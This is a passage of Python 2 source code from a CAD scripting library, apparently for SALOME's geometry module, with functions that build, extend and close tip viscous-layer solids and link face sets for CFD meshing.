filling_edge_3d = geompy.MakeArcOfEllipse(foil_vertex, offset_vertex, translated_vertex)
filling_edges_3d.append(filling_edge_3d)
else:
filling_edge_3d = geompy.MakeEdge(offset_vertex, translated_vertex)
filling_edges_3d.append(filling_edge_3d)
#-
if dim >= 2:
if parameter == 0 or parameter == 1:# If it is the first or the last position...
# Create the boundary face
third_edge = geompy.MakeEdge(foil_vertex, translated_vertex)
boundary_faces.append(geompy.MakeFaceWires([filling_edge_3d, filling_edge_2d, third_edge], True))
#-
# Put the filling edges into compounds
filling_edge_compound_2d = geompy.MakeCompound(filling_edges_2d)
filling_edge_compound_3d = geompy.MakeCompound(filling_edges_3d)
#-
# Add and return the resulting shape(s)
if dim == 1:
if add == True:
AddToStudy(filling_edge_compound_2d, "TipViscousLayer (Edges)", father)
AddToStudy(filling_edge_compound_3d, "TipViscousLayer (Edges)", father)
return [filling_edge_compound_2d, filling_edge_compound_3d]
#-
else:
# Create the fillings
filling_2d = geompy.MakeFilling(filling_edge_compound_2d, theMinDeg = 15, theMaxDeg = 20, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
filling_3d = geompy.MakeFilling(filling_edge_compound_3d, theMinDeg = 15, theMaxDeg = 20, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
# Extrude the foil edge
foil_extension = geompy.MakePrismVecH(foil[-1], normal_vector, dist)
#-
# Create the compound from faces
face_compound = geompy.MakeCompound([filling_2d, filling_3d, foil_extension, boundary_faces[0], boundary_faces[1]])
#-
# Add and return the resulting shape(s)
if dim == 2:
if add == True:
AddToStudy(face_compound, "TipViscousLayer (Faces)", father)
return face_compound
#-
else:
# Glue the edges
gluing_tolerance = tol
while True:
free_boundaries = geompy.GetFreeBoundary(face_compound)[1]
if len(free_boundaries) == 0:
break
face_compound = geompy.MakeGlueEdges(face_compound, gluing_tolerance)
gluing_tolerance *= 2
#-
# Create the shell form the compound
shell = geompy.MakeShell([face_compound])
#-
# Create the solid from the shell
solid = geompy.MakeSolid([shell])
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(solid, "TipViscousLayer", father)
return solid
#-
mtvl = MakeTipViscousLayer
def ExtendTipViscousLayer( shell_and_compound = [None], np = 40, tol = 1e-7, add = True, infa = False, dim = 3 ):
"""
Description:
Extends a tip viscous layer.
Arguments:
# shell_and_compound
Description: the input shell to extend and its guiding edge compound.
Type: List of 1 Shell + 1 Compound of Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 40
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 3
Returned Values:
"dim" value: 1
"single" value: -
Type: Compound of Edges
Number: 5 or 8
Name: "TipViscousLayerExtension (Edges)"
"dim" value: 2
"single" value: -
Type: Compound of Faces
Number: 2 or 3
Name: "TipViscousLayerExtension (Faces)"
"dim" value: 3
"single" value: -
Type: Compound of Solids
Number: 1
Name: "TipViscousLayerExtension"
Conditions of use:
The input shell has to contain 2 faces having the shape of triangles or ellipse quarters and an optional middle face being a quadrangle. The edge compound has to have all the characteristics of a compound build with the ExtendViscousLayer function.
"""
if isinstance(shell_and_compound, list) == False: print "[X] The first argument (shell_and_compound) should be an array."; return
if isinstance(np, str): print "[X] The second argument (np) should be an integer ."; return
if dim == 0: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
shell_and_compound = GetGUISelection(shell_and_compound)
shell_and_compound = GetObject(shell_and_compound)
#-
# Check the input shape existence
if "error" in shell_and_compound or None in shell_and_compound: return
#-
# Check the number of selected objects
if len(shell_and_compound) != 2:
print "[X] Two objects should be selected."
return
#-
# Distinguish input shapes
shell = None
compound = None
for object in shell_and_compound:
nb_faces = geompy.NumberOfFaces(object)
if nb_faces > 0:
shell = object
else:
compound = object
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Check if the input shape is "shell-shaped"
shell_faces = GetSubShapes(shell)[2]
try:
shell = geompy.MakeShell(shell_faces)
except:
print "[X] The input 2D shape should be \"shell-shaped\"."; return
#-
# Keep edges touching the input shell
compound_edges = GetSubShapes(compound)[1]
edges_to_keep = []
for edge in compound_edges:
edge_vertexes = GetSubShapes(edge)[0]
distance_1 = geompy.MinDistance(edge_vertexes[0], shell)
distance_2 = geompy.MinDistance(edge_vertexes[1], shell)
distances = [distance_1, distance_2]
if min(distances) <= tol and max(distances) > tol:
edges_to_keep.append(edge)
compound = geompy.MakeCompound(edges_to_keep)
#-
# Get the sub - geometries
[shell, compound] = GetSubShapes([shell, compound])
#-
# Get the normal direction
compound_vertex_compound = geompy.MakeCompound(compound[0])
shell_vertex_compound = geompy.MakeCompound(shell[0])
top_vertex_compound = geompy.MakeCut(shell_vertex_compound, compound_vertex_compound)
top_vertex = None
for vertex in shell[0]:
distance = geompy.MinDistance(vertex, compound[-1])
if distance > tol:
top_vertex = vertex
break
bottom_vertex = geompy.GetShapesNearPoint(compound[-1], top_vertex, geompy.ShapeType["VERTEX"])
normal = geompy.MakeVector(bottom_vertex, top_vertex)
#-
# Get root normal thickness
root_normal_thickness = geompy.BasicProperties(normal)[0]
#-
# Distinguish inside and outside edges
inside_edges = []
outside_edges = []
for edge in compound[1]:
edge_vertexes = geompy.SubShapeAll(edge, geompy.ShapeType["VERTEX"])
for edge_vertex in edge_vertexes:
min_distance = geompy.MinDistance(edge_vertex, shell[-1])
if min_distance <= tol:
nb_contacts = 0
for face in shell[2]:
min_distance = geompy.MinDistance(edge_vertex, face)
if min_distance <= tol:
nb_contacts += 1
if nb_contacts == 1:
outside_edges.append(edge)
else:
inside_edges.append(edge)
break
#-
# Get local thickness
inside_edge_compound = geompy.MakeCompound(inside_edges)
local_thickness_lists = []
for outside_edge in outside_edges:
some_outside_edge_vertex = GetSubShapes(outside_edge)[0][0]
inside_edge = geompy.GetShapesNearPoint(inside_edge_compound, some_outside_edge_vertex, geompy.ShapeType["EDGE"])
edge_1 = inside_edge
edge_2 = outside_edge
length_1 = geompy.BasicProperties(edge_1)[0]
length_2 = geompy.BasicProperties(edge_2)[0]
[x, y, z] = geompy.ClosestPoints(edge_1, shell[-1])[1][0:3]
first_vertex_1 = geompy.MakeVertex(x, y, z)
[x, y, z] = geompy.ClosestPoints(edge_2, shell[-1])[1][0:3]
first_vertex_2 = geompy.MakeVertex(x, y, z)
local_thicknesses = []
for parameter in [n / float(np - 1) for n in range(np)]:
vertex_1 = geompy.MakeVertexOnCurveByLength(edge_1, parameter * length_1, first_vertex_1)
vertex_2 = geompy.MakeVertexOnCurveByLength(edge_2, parameter * length_2, first_vertex_2)
local_thickness = geompy.MinDistance(vertex_1, vertex_2)
local_thicknesses.append(local_thickness)
local_thickness_lists.append(local_thicknesses)
nb_local_thicknesses = len(local_thickness_lists[0])
final_local_thicknesses = []
for i in range(nb_local_thicknesses):
final_local_thickness = (local_thickness_lists[0][i] + local_thickness_lists[1][i]) / 2.0
final_local_thicknesses.append(final_local_thickness)
normal_thickness_scale = root_normal_thickness / final_local_thicknesses[0]
for i in range(nb_local_thicknesses):
final_local_thicknesses[i] = final_local_thicknesses[i] * normal_thickness_scale
#-
# Create the missing outside edges
missing_outside_edges = []
for inside_edge in inside_edges:
edge_1 = inside_edge
length_1 = geompy.BasicProperties(edge_1)[0]
[x, y, z] = geompy.ClosestPoints(edge_1, shell[-1])[1][0:3]
first_vertex_1 = geompy.MakeVertex(x, y, z)
outside_missing_edge_vertexes = []
i = 0
for parameter in [n / float(np - 1) for n in range(np)]:
vertex_1 = geompy.MakeVertexOnCurveByLength(edge_1, parameter * length_1, first_vertex_1)
vertex_2 = geompy.MakeTranslationVectorDistance(vertex_1, normal, final_local_thicknesses[i])
outside_missing_edge_vertexes.append(vertex_2)
i += 1
missing_outside_edge = geompy.MakeInterpol(outside_missing_edge_vertexes)
missing_outside_edges.append(missing_outside_edge)
# Add the missing outside edges to the edge list
path_edges = compound[1] + missing_outside_edges
#-
# Create the fillings
shell_edges = geompy.SubShapeAll(shell[-1], geompy.ShapeType["EDGE"])
fillings = []
filling_edge_compounds = []
i = 0
for shell_edge in shell_edges:# For each edge of the face compound...
# Get the edge style
shell_edge_length = geompy.BasicProperties(shell_edge)[0]
shell_edge_vertexes = geompy.SubShapeAll(shell_edge, geompy.ShapeType["VERTEX"])
rebuilt_straight_edge = geompy.MakeEdge(shell_edge_vertexes[0], shell_edge_vertexes[1])
rebuilt_straight_edge_length = geompy.BasicProperties(rebuilt_straight_edge)[0]
if abs(shell_edge_length - rebuilt_straight_edge_length) <= tol:
style = "straight"
else:
style = "smooth"
#-
# Get the path edges
edge_path_edges = []
for path_edge in path_edges:
min_distance = geompy.MinDistance(path_edge, shell_edge)
if min_distance <= tol:
edge_path_edges.append(path_edge)
#-
# Get the center edge
if style == "smooth":
# Get the adjacent edges
shell_edge_adjacent_edges = []
other_face_compound_edges = list(shell_edges)
del other_face_compound_edges[i]
for other_face_compound_edge in other_face_compound_edges:
min_distance = geompy.MinDistance(other_face_compound_edge, shell_edge)
if min_distance <= tol:
shell_edge_adjacent_edges.append(other_face_compound_edge)
#-
# Put them in a compound
shell_edge_adjacent_edge_compound = geompy.MakeCompound(shell_edge_adjacent_edges)
#-
# Get the center edge
center_edge = None
for inside_edge in inside_edges:
min_distance = geompy.MinDistance(inside_edge, shell_edge_adjacent_edge_compound)
if min_distance <= tol:
center_edge = inside_edge
break
#-
#-
# Get the edge lengths
length_1 = geompy.BasicProperties(edge_path_edges[0])[0]
length_2 = geompy.BasicProperties(edge_path_edges[1])[0]
#-
# Get the edge vertexes
edge_path_edge_1_vertexes = geompy.SubShapeAll(edge_path_edges[0], geompy.ShapeType["VERTEX"])
first_vertex_1 = edge_path_edge_1_vertexes[0]
last_vertex_1 = edge_path_edge_1_vertexes[1]
edge_path_edge_2_vertexes = geompy.SubShapeAll(edge_path_edges[1], geompy.ShapeType["VERTEX"])
first_vertex_2 = edge_path_edge_2_vertexes[0]
last_vertex_2 = edge_path_edge_2_vertexes[1]
# Get the offset edge sense
linking_edge_1 = geompy.MakeEdge(first_vertex_1, first_vertex_2)
linking_edge_2 = geompy.MakeEdge(first_vertex_1, last_vertex_2)
linking_edge_1_length = geompy.BasicProperties(linking_edge_1)[0]
linking_edge_2_length = geompy.BasicProperties(linking_edge_2)[0]
reverse_length = False
if linking_edge_1_length > linking_edge_2_length:
reverse_length = True
#-
# Create the filling edges
filling_edges = []
#for parameter in [1 - n / float(np - 1) for n in range(np)]:
for parameter in [n / float(np - 1) for n in range(np)]:
# Create the vertexes
vertex_1 = geompy.MakeVertexOnCurveByLength(edge_path_edges[0], parameter * length_1, first_vertex_1)
if reverse_length == True:
parameter = 1.0 - parameter
vertex_2 = geompy.MakeVertexOnCurveByLength(edge_path_edges[1], parameter * length_2, first_vertex_2)
if style == "smooth":
length_0 = geompy.BasicProperties(center_edge)[0]
first_vertex_0 = geompy.SubShapeAll(center_edge, geompy.ShapeType["VERTEX"])[0]
vertex_0 = geompy.MakeVertexOnCurveByLength(center_edge, parameter * length_0, first_vertex_0)
#-
# Create the filling edge
if style == "straight":
filling_edge = geompy.MakeEdge(vertex_1, vertex_2)
elif style == "smooth":
filling_edge = geompy.MakeArcOfEllipse(vertex_0, vertex_1, vertex_2)
#-
# Create the filling edge compound
filling_edges.append(filling_edge)
#-
# Create the filling edge compound
filling_edge_compound = geompy.MakeCompound(filling_edges)
filling_edge_compounds.append(filling_edge_compound)
#-
# Create the filling
fillings.append(geompy.MakeFilling(filling_edge_compound, theMinDeg = 15, theMaxDeg = 20, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect))
#-
#-
# Add and return the resulting shape(s)
if dim == 1:
if add == True:
AddToStudy(filling_edge_compounds, "TipViscousLayerExtension (Edges)", father)
return filling_edge_compounds
#-
else:
# Create the filling shells
filling_shells = []
for face in shell[2]:# For each face of the input compound...
# Get the fillings
face_fillings = []
for filling in fillings:
filling_vertexes = geompy.SubShapeAll(filling, geompy.ShapeType["VERTEX"])
nb_contacts = 0
for filling_vertex in filling_vertexes:
min_distance = geompy.MinDistance(filling_vertex, face)
if min_distance <= tol:
nb_contacts += 1
if nb_contacts == 2:
face_fillings.append(filling)
#-
# Create the filling shell
filling_shells.append(geompy.MakeShell(face_fillings + [face]))
#-
#-
# Add and return the resulting shape(s)
if dim == 2:
if add == True:
AddToStudy(filling_shells, "TipViscousLayerExtension (Faces)", father)
return filling_shells
#-
else:
# Create the solids
solids = []
for filling_shell in filling_shells:
# Glue the edges
gluing_tolerance = tol * 1e2
while True:
free_boundaries = geompy.GetFreeBoundary(filling_shell)[1]
if len(free_boundaries) == 1:
free_boundary = free_boundaries[0]
free_boundary_length = geompy.BasicProperties(free_boundary)[0]
free_boundary_nodes = GetSubShapes(free_boundary)[0]
plane = geompy.MakePlaneThreePnt(free_boundary_nodes[0], free_boundary_nodes[1], free_boundary_nodes[2], free_boundary_length * 1e3)
common = geompy.MakeCommon(free_boundary, plane)
if GeometricalEquality([free_boundary, common], tol = 1) == True:
break
try:
filling_shell = geompy.MakeGlueEdges(filling_shell, gluing_tolerance)
except:
try:
tmp_shape = geompy.MakeSewing(filling_shell, gluing_tolerance)
if tmp_shape != None:
filling_shell = tmp_shape
except:
AddToStudy(filling_shell, "ProblematicShape")
print "[X] Some internal shape could not be glued."; return
gluing_tolerance *= 2
#-
# Get the missing face wire
filling_shell_hole_wire = geompy.GetFreeBoundary(filling_shell)[1][0]
#-
# Create the missing face
try:
filling_shell_missing_face = geompy.MakeFace(filling_shell_hole_wire, True)
except:
print "[X] One internal shell could not be closed."
if add == True:
AddToStudy(filling_shell, "ProblematicShape")
return filling_shell
#-
# Create the final shell
filling_shell = geompy.MakeShell([filling_shell, filling_shell_missing_face])
#-
# Create the solid
solids.append(geompy.MakeSolid([filling_shell]))
#-
#-
# Put the solids into a compound
solids = geompy.MakeCompound(solids)
#-
# Glue faces into the compound
try:
solids = geompy.MakeGlueFaces(solids, tol * 1e2)
except:
print "[*] The glue operation failed on the final shape."
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(solids, "TipViscousLayerExtension", father)
return solids
#-
etvl = ExtendTipViscousLayer
def CloseTipViscousLayer( shell_and_compound = [None], np = 20, tol = 1e-7, add = True, infa = False, dim = 3 ):
"""
Description:
Close a tip viscous layer.
Arguments:
# shell_and_compound
Description: the shell to close and its guiding edge compound.
Type: List of 1 Shell + 1 Compound of Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 3
Returned Values:
"dim" value: 1
"single" value: -
Type: Compound of Edges
Number: 4 or 6
Name: "TipViscousLayerClosing (Edges)"
"dim" value: 2
"single" value: -
Type: Compound of Faces
Number: 2 or 3
Name: "TipViscousLayerClosing (Faces)"
"dim" value: 3
"single" value: -
Type: Compound of Solids
Number: 1
Name: "TipViscousLayerClosing"
Conditions of use:
The input shell has to contain 2 faces having the shape of triangles or ellipse quarters and an optional middle face being a quadrangle. The edge compound has to have all the characteristics of a compound build with the CloseViscousLayer function.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if isinstance(shell_and_compound, list) == False: print "[X] The second argument (shell_and_compound) should be an array."; return
if dim == 0: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
shell_and_compound = GetGUISelection(shell_and_compound)
shell_and_compound = GetObject(shell_and_compound)
#-
# Check the input shape existence
if "error" in shell_and_compound or None in shell_and_compound: return
#-
# Check the number of selected objects
if len(shell_and_compound) != 2:
print "[X] Two objects should be selected."
return
#-
# Distinguish input shapes
shell = None
compound = None
for object in shell_and_compound:
nb_faces = int(geompy.WhatIs(object).split("\n")[3].split(": ")[1])
if nb_faces > 0:
shell = object
else:
compound = object
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Check if the input shape is "shell-shaped"
shell_faces = GetSubShapes(shell)[2]
try:
shell = geompy.MakeShell(shell_faces)
except:
print "[X] The input 2D shape should be \"shell-shaped\"."; return
#-
# Keep edges touching the input shell
compound_edges = GetSubShapes(compound)[1]
edges_to_keep = []
for edge in compound_edges:
edge_vertexes = GetSubShapes(edge)[0]
distance_1 = geompy.MinDistance(edge_vertexes[0], shell)
distance_2 = geompy.MinDistance(edge_vertexes[1], shell)
distances = [distance_1, distance_2]
if max(distances) > tol:
edges_to_keep.append(edge)
compound = geompy.MakeCompound(edges_to_keep)
#-
shapes_to_return = []
# Get the sub-shapes
[shell, compound] = GetSubShapes([shell, compound])
#-
# Get the start edges
start_edges = []
for shell_edge in shell[1]:# For each edge in the face compound...
shell_edge_vertexes = geompy.SubShapeAll(shell_edge, geompy.ShapeType["VERTEX"])
# Get the number of adjacent face
nb_adjacent_faces = 0
for face in shell[2]:
nb_contacts = 0
for shell_edge_vertex in shell_edge_vertexes:
min_distance = geompy.MinDistance(shell_edge_vertex, face)
if min_distance <= tol:
nb_contacts += 1
if nb_contacts == 2:
nb_adjacent_faces += 1
#-
# Get the number of contact with the edge compound
nb_contacts = 0
for shell_edge_vertex in shell_edge_vertexes:
min_distance = geompy.MinDistance(shell_edge_vertex, compound[-1])
if min_distance <= tol:
nb_contacts += 1
#-
# Add the edge to the start edge list
if nb_adjacent_faces == 1 and nb_contacts == 1:
start_edges.append(shell_edge)
#-
#-
# Make the outside solids
solids = []
for start_edge in start_edges:# For each start edge...
start_edge_vertexes = geompy.SubShapeAll(start_edge, geompy.ShapeType["VERTEX"])
# Get the adjacent face
adjacent_face = None
for face in shell[2]:
nb_contacts = 0
for start_edge_vertex in start_edge_vertexes:
min_distance = geompy.MinDistance(start_edge_vertex, face)
if min_distance <= tol:
nb_contacts += 1
if nb_contacts == 2:
adjacent_face = face
break
#-
# Get the center vertex
center_vertex = None
adjacent_face_vertexes = geompy.SubShapeAll(adjacent_face, geompy.ShapeType["VERTEX"])
for adjacent_face_vertex in adjacent_face_vertexes:
min_distance = geompy.MinDistance(adjacent_face_vertex, start_edge)
if min_distance > tol:
center_vertex = adjacent_face_vertex
break
#-
# Get the start vertex
start_vertex = None
for adjacent_face_vertex in adjacent_face_vertexes:
min_distance = geompy.MinDistance(adjacent_face_vertex, compound[-1])
if min_distance > tol:
start_vertex = adjacent_face_vertex
break
#-
# Get the center edge
center_edge = geompy.MakeEdge(center_vertex, start_vertex)
#-
# Get the path edge
path_edge = None
for edge in compound[1]:
min_distance = geompy.MinDistance(edge, start_edge)
if min_distance <= tol:
path_edge = edge
break
#-
# Get the edge style
start_edge_length = geompy.BasicProperties(start_edge)[0]
rebuilt_straight_start_edge = geompy.MakeEdge(start_edge_vertexes[0], start_edge_vertexes[1])
rebuilt_straight_start_edge_length = geompy.BasicProperties(rebuilt_straight_start_edge)[0]
if abs(start_edge_length - rebuilt_straight_start_edge_length) <= tol:
style = "straight"
else:
style = "smooth"
#-
# Create the filling edges
start_face = None
end_face = None
filling_edges_2d = []
filling_edges_3d = []
for parameter in [n / float(np - 1) for n in range(np)]:
# Create the vertexes
length = geompy.BasicProperties(path_edge)[0]
vertex = geompy.MakeVertexOnCurveByLength(path_edge, parameter * length)
#-
# Create the filling edge
if style == "straight":
filling_edge_3d = geompy.MakeEdge(start_vertex, vertex)
elif style == "smooth":
filling_edge_3d = geompy.MakeArcOfEllipse(center_vertex, start_vertex, vertex)
filling_edge_2d = geompy.MakeEdge(center_vertex, vertex)
filling_edges_3d.append(filling_edge_3d)
filling_edges_2d.append(filling_edge_2d)
#-
if parameter == 0:
# Create the start face
start_face_wire = geompy.MakeWire([center_edge, filling_edge_2d, filling_edge_3d])
start_face = geompy.MakeFace(start_face_wire, True)
#-
if parameter == 1:
# Create the end face
end_face_wire = geompy.MakeWire([center_edge, filling_edge_2d, filling_edge_3d])
end_face = geompy.MakeFace(end_face_wire, True)
#-
# Create the filling edge compounds
filling_edge_compound_2d = geompy.MakeCompound(filling_edges_2d)
filling_edge_compound_3d = geompy.MakeCompound(filling_edges_3d)
#-
if dim == 1:
shapes_to_return.append(filling_edge_compound_2d)
shapes_to_return.append(filling_edge_compound_3d)
else:
# Create the fillings
filling_2d = geompy.MakeFilling(filling_edge_compound_2d, theMaxDeg = 20, theNbIter = 1, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
filling_3d = geompy.MakeFilling(filling_edge_compound_3d, theMaxDeg = 20, theNbIter = 1, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
# Remove the extra edges
filling_2d = RemoveFaceExtraEdges(filling_2d, add = False)
filling_3d = RemoveFaceExtraEdges(filling_3d, add = False)
#-
# Create the filling compound
filling_shell = geompy.MakeShell([start_face, end_face, filling_2d, filling_3d])
#-
if dim == 2:
shapes_to_return.append(filling_shell)
else:
# Sew the shell
sewing_tolerance = tol
while True:
free_boundaries = geompy.GetFreeBoundary(filling_shell)[1]
if len(free_boundaries) == 0:
break
filling_shell = geompy.MakeSewing(filling_shell, sewing_tolerance)
sewing_tolerance *= 2
#-
# Create the solid
solids.append(geompy.MakeSolid([filling_shell]))
#-
#-
# Get the inside face
inside_faces = []
for face in shell[2]:
nb_adjacent_start_edges = 0
for start_edge in start_edges:
start_edge_vertexes = geompy.SubShapeAll(start_edge, geompy.ShapeType["VERTEX"])
nb_contacts = 0
for start_edge_vertex in start_edge_vertexes:
min_distance = geompy.MinDistance(start_edge_vertex, face)
if min_distance <= tol:
nb_contacts += 1
if nb_contacts >= 2:
nb_adjacent_start_edges += 1
if nb_adjacent_start_edges == 0:
inside_faces.append(face)
#-
# Create the inside solid
for inside_face in inside_faces:# For inside face...
inside_face_edges = geompy.SubShapeAll(inside_face, geompy.ShapeType["EDGE"])
path_edges = []
center_edge = None
for inside_face_edge in inside_face_edges:
# Get the center edge
nb_contacts = 0
inside_face_edge_vertexes = geompy.SubShapeAll(inside_face_edge, geompy.ShapeType["VERTEX"])
for inside_face_edge_vertex in inside_face_edge_vertexes:
min_distance = geompy.MinDistance(inside_face_edge_vertex, compound[-1])
if min_distance <= tol:
nb_contacts += 1
if nb_contacts == 2:
center_edge = inside_face_edge
#-
# Get the first path edge
min_distance = geompy.MinDistance(inside_face_edge, compound[-1])
if min_distance > tol:
path_edges.append(inside_face_edge)
#-
# Get the second path edge
for edge in compound[1]:
min_distance = geompy.MinDistance(shell[-1], edge)
if min_distance > tol:
path_edges.append(edge)
#-
# Create filling edges
filling_edges_2d = []
filling_edges_3d = []
# Get the start vertexes
length_0 = geompy.BasicProperties(center_edge)[0]
length_1 = geompy.BasicProperties(path_edges[0])[0]
length_2 = geompy.BasicProperties(path_edges[1])[0]
first_vertex_0 = geompy.SubShapeAll(center_edge, geompy.ShapeType["VERTEX"])[0]
first_vertex_1 = geompy.SubShapeAll(path_edges[0], geompy.ShapeType["VERTEX"])[0]
last_vertex_1 = geompy.SubShapeAll(path_edges[0], geompy.ShapeType["VERTEX"])[1]
first_vertex_1_adjacent_edge = None
for edge in compound[1]:
min_distance = geompy.MinDistance(edge, first_vertex_0)
if min_distance <= tol:
first_vertex_1_adjacent_edge = edge
break
path_edge_vertexes = geompy.SubShapeAll(path_edges[1], geompy.ShapeType["VERTEX"])
first_vertex_2 = None
last_vertex_2 = None
for path_edge_vertex in path_edge_vertexes:
min_distance = geompy.MinDistance(path_edge_vertex, first_vertex_1_adjacent_edge)
if min_distance <= tol:
first_vertex_2 = path_edge_vertex
else:
last_vertex_2 = path_edge_vertex
#-
# Create the start face and end face edges
center_edge_vertexes = geompy.SubShapeAll(center_edge, geompy.ShapeType["VERTEX"])
start_face_edge_1 = geompy.MakeEdge(first_vertex_0, first_vertex_1)
start_face_edge_2 = geompy.MakeEdge(first_vertex_0, first_vertex_2)
end_face_edge_1 = geompy.MakeEdge(center_edge_vertexes[1], last_vertex_1)
end_face_edge_2 = geompy.MakeEdge(center_edge_vertexes[1], last_vertex_2)
#-
for parameter in [n / float(np - 1) for n in range(np)]:
# Create the vertexes
vertex_0 = geompy.MakeVertexOnCurveByLength(center_edge, parameter * length_0, first_vertex_0)
vertex_1 = geompy.MakeVertexOnCurveByLength(path_edges[0], parameter * length_1, first_vertex_1)
vertex_2 = geompy.MakeVertexOnCurveByLength(path_edges[1], parameter * length_2, first_vertex_2)
#-
# Create the filling edges 3D
if style == "straight":
filling_edge_3d = geompy.MakeEdge(vertex_1, vertex_2)
elif style == "smooth":
filling_edge_3d = geompy.MakeArcOfEllipse(vertex_0, vertex_1, vertex_2)
filling_edges_3d.append(filling_edge_3d)
#-
# Create the filling edges 2D
filling_edge_2d = geompy.MakeEdge(vertex_0, vertex_2)
filling_edges_2d.append(filling_edge_2d)
#-
if parameter == 0:
# Create the start face
start_face_wire = geompy.MakeWire([start_face_edge_1, start_face_edge_2, filling_edge_3d])
start_face = geompy.MakeFace(start_face_wire, True)
#-
if parameter == 1:
# Create the end face
end_face_wire = geompy.MakeWire([end_face_edge_1, end_face_edge_2, filling_edge_3d])
end_face = geompy.MakeFace(end_face_wire, True)
#-
#-
# Create the filling edge compounds
filling_edge_compound_2d = geompy.MakeCompound(filling_edges_2d)
filling_edge_compound_3d = geompy.MakeCompound(filling_edges_3d)
#-
if dim == 1:
shapes_to_return.append(filling_edge_compound_2d)
shapes_to_return.append(filling_edge_compound_3d)
else:
# Create the fillings
filling_2d = geompy.MakeFilling(filling_edge_compound_2d, theMaxDeg = 20, theNbIter = 1, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
filling_3d = geompy.MakeFilling(filling_edge_compound_3d, theMaxDeg = 20, theNbIter = 1, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
# Create the filling compound
filling_shell = geompy.MakeShell([inside_face, start_face, end_face, filling_2d, filling_3d])
#-
if dim == 2:
shapes_to_return.append(filling_shell)
else:
# Sew the shell
sewing_tolerance = tol * 1e2
while True:
free_boundaries = geompy.GetFreeBoundary(filling_shell)[1]
if len(free_boundaries) == 0:
break
filling_shell = geompy.MakeSewing(filling_shell, sewing_tolerance)
sewing_tolerance *= 2
#-
# Create the solid
solids.append(geompy.MakeSolid([filling_shell]))
#-
#-
if dim == 1:
if add == True:
AddToStudy(shapes_to_return, "TipViscousLayerClosing (Edges)", father)
return shapes_to_return
elif dim == 2:
if add == True:
AddToStudy(shapes_to_return, "TipViscousLayerClosing (Faces)", father)
return shapes_to_return
else:
# Put the solids into a compound
solids = geompy.MakeCompound(solids)
#-
# Glue faces into the compound
try:
solids = geompy.MakeGlueFaces(solids, tol * 1e2)
except:
print "[*] The glue operation failed on the final shape."
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(solids, "TipViscousLayerClosing", father)
return solids
#-
ctvl = CloseTipViscousLayer
def MakeLinkingSolids( face_and_edge_compounds = [None], tol = 1e-7, add = True, dim = 3 ):
"""
Description:
Creates solids linking two sets of faces.
Arguments:
# face_and_edge_compounds
Description: The faces compounds to link + the linking edge compound.
Type: List of 2 Compounds of Faces + 1 Compound of Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 3
Returned Values:
"dim" value: 2
"single" value: -
Type: Compound of Faces
Number: n
Name: "LinkingSolids (Faces)"
"dim" value: 3
"single" value: -
Type: Compound of Solids
Number: 1
Name: "LinkingSolids"
Conditions of use:
All vertexes of one face compound have to be linked with another vertex from the second face compound.
"""
if isinstance(face_and_edge_compounds, list) == False: print "[X] The first argument (face_and_edge_compounds) should be an array."; return
if dim < 2: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
face_and_edge_compounds = GetGUISelection(face_and_edge_compounds)
face_and_edge_compounds = GetObject(face_and_edge_compounds)
#-
# Check the input shape existence
if "error" in face_and_edge_compounds or None in face_and_edge_compounds: return
#-
# Check the number of selected objects
if len(face_and_edge_compounds) != 3:
print "[X] Three objects should be selected."
return
#-
# Distinguish input shapes
face_compounds = []
edge_compound = None
for object in face_and_edge_compounds:
nb_faces = int(geompy.WhatIs(object).split("\n")[3].split(": ")[1])
if nb_faces > 0:
face_compounds.append(object)
else:
edge_compound = object
#-
if False: pass
else:# All checks done
shapes_to_return = []
# Get the sub-shapes
#[face_compound1, face_compound2, edge_compound] = GetSubShapes(face_compounds + [edge_compound])
[face_compound2, face_compound1, edge_compound] = GetSubShapes(face_compounds + [edge_compound])
#-
# Create the solids
solids = []
for face_1 in face_compound1[2]:# For each face of the face compound 1...
# Get the linking edges
face_1_linking_edges = []
for edge in edge_compound[1]:
min_distance = geompy.MinDistance(edge, face_1)
if min_distance <= tol:
